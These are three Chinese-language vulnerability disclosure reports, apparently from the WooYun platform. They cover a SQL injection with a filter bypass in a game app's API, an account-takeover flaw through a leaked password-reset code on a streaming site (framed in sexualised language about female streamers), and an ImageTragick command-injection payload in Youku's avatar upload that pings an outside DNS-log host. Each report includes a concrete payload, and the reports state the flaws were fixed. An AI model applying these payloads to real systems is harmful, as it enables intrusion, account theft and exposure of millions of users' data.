漏洞详情披露状态： 2016-05-05： 细节已通知厂商并且等待厂商处理中2016-05-05： 厂商已经确认，细节仅向厂商公开2016-05-15： 细节向核心白帽子及相关领域专家公开2016-05-25： 细节向普通白帽子公开2016-06-04： 细节向实习白帽子公开2016-06-19： 细节向公众公开简要描述：APP安全之SQL注入详细说明：目标：草花游戏Android APP检测发现以下地方存在SQL注入：（注入参数PUserName，报错注入）code 区域http://switch.api.caohua.com/Api/CheckSalf.ashx?DeviceNo=B30FE6BC79CA96D418E41790D80A8E1B&Times=1462374589&UserID=639&AppID=133&PUserName=374587368&SourceID=576&Sign=C92A3457E748E4813A7B3AAD294595FAPayload：code 区域http://switch.api.caohua.com/Api/CheckSalf.ashx?DeviceNo=B30FE6BC79CA96D418E41790D80A8E1B&Times=1462374589&UserID=639&AppID=133&PUserName=374587368%27%20AND%203750=CONVERT%28INT,user%29%20--%20%20-&SourceID=576&Sign=C92A3457E748E4813A7B3AAD294595FA由于过滤了select，使用编码绕过即可~code 区域select -> %u0073elect 漏洞证明：1、当前数据库用户2、所有数据库3、用户表，涉及700W+用户数据/800W+设备信息，具体就不深入了~修复方案：请多指教~版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：20确认时间：2016-05-05 11:31厂商回复：大大厉害,我们再接再厉最新状态：2016-05-05：漏洞已经修复，谢谢大大了。麻烦给各联系方式2016-05-06：已修复

漏洞详情披露状态： 2016-06-06： 细节已通知厂商并且等待厂商处理中2016-06-07： 厂商已经确认，细节仅向厂商公开2016-06-07： 厂商已经修复漏洞并主动公开，细节向公众公开简要描述：在她直播的时候可以上了她 的 账号！详细说明：http://www.69xiu.com/rank拿主站一个正在直播的女主播演示一下进入直播页面可以看到妹子正在卖力的直播中，个人页面存在信息泄露，可获取到主播的邮箱地址email":"[email protected]/* */密码找回的功能也存在信息泄露，可利用邮箱重置密码（为了不影响厂商业务，犹豫了一下还是拿我自己的演示吧）漏洞证明：http://www.69xiu.com/my/checkemail/findpwd/输入邮箱找回密码可以看到只要知道code就能构造重置链接response这里又泄露了当然 女主播的也一样is_findpwd_email=a:4:{s:8:"sendtime";i:1464837456;s:6:"verify";s:32:"9d591fd9e63ce54529f589c27c4e4357";s:5:"email";s:17:"[email protected]/* */";s:6:"mobile";s:0:"";};http://www.69xiu.com/my/checkemail/isfindpwd/?code=9d591fd9e63ce54529f589c27c4e4357所以，在她直播的时候可以上了她 的 账号就不进一步演示了。。。还有好多女主播，列举几个code 区域MPT.Config("objRid", 71094697); MPT.Config("objArtist", {"baseInfo":{"uid":"19971567","nickname":"\u51ef\u6492\u5927\u5e1d111","sex":"2","email":"[email protected]/* */MPT.Config("objRid", 71096441);MPT.Config("objArtist", {"baseInfo":{"uid":"19972437","nickname":"AK\u4e36 \u7cd6\u679c","sex":"2","email":"[email protected]/* */"MPT.Config("objRid", 71074401);MPT.Config("objArtist", {"baseInfo":{"uid":"19961505","nickname":"\u70ed\u821e\u8587\u513f\u65b0\u4eba\u6c42","sex":"2","email":"[email protected]/* */" 修复方案：email/code别返回版权声明：转载请注明来源 getshell1993@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：18确认时间：2016-06-07 15:12厂商回复：漏洞已修复，高兴您对69秀的关注！最新状态：2016-06-07：漏洞已修复,非常感谢！

漏洞详情披露状态： 2016-05-05： 细节已通知厂商并且等待厂商处理中2016-05-05： 厂商已经确认，细节仅向厂商公开2016-05-15： 细节向核心白帽子及相关领域专家公开2016-05-25： 细节向普通白帽子公开2016-06-04： 细节向实习白帽子公开2016-06-19： 细节向公众公开简要描述：优酷主站存在远程命令执行漏洞详细说明：#1 漏洞位置个人头像上传http://i.youku.com/u/setting/base_avatar.html#2 payloadcode 区域push graphic-context viewbox 0 0 640 480 fill 'url(https://"|ping img.99fd5e.dnslog.info -c 1")' pop graphic-context 漏洞证明： code 区域05-May-2016 17:45:15.425 queries: client 220.181.185.161#40524 (img.99fd5e.dnslog.info): query: img.99fd5e.dnslog.info IN A - (128.199.200.236) 05-May-2016 17:46:33.153 queries: client 220.181.185.161#47453 (img.99fd5e.dnslog.info): query: img.99fd5e.dnslog.info IN A -ED (128.199.200.236) 修复方案：更新版权声明：转载请注明来源 猪猪侠@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：20确认时间：2016-05-05 18:25厂商回复：感谢猪猪侠报告！漏洞修复中！最新状态：暂无